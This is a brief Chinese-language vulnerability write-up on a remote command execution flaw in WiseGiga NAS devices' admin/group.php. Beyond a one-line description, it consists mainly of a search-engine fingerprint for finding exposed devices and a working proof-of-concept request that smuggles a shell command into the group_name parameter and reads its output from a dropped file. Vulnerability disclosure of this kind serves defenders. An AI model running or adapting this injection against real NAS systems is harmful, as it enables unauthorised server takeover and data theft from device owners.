# WiseGiga NAS group.php 远程命令执行漏洞

## 漏洞描述

WiseGiga 是一家销售网络连接存储（NAS ）产品的韩国公司。

WiseGiga NAS group.php文件存在远程命令执行漏洞，攻击者通过发送特定的请求包可以获取服务器权限

## 漏洞影响

```
WiseGiga NAS
```

## 网络测绘

```
app="WISEGIGA-NAS"
```

## 漏洞复现

主页面

![image-20220628113649787](images/202206281144970.png)

验证POC

```
/admin/group.php?memberid=root&cmd=add&group_name=d;id>1.txt
```

![image-20220628114731029](images/202206281147112.png)

```
/admin/1.txt
```

![image-20220628114740534](images/202206281147595.png)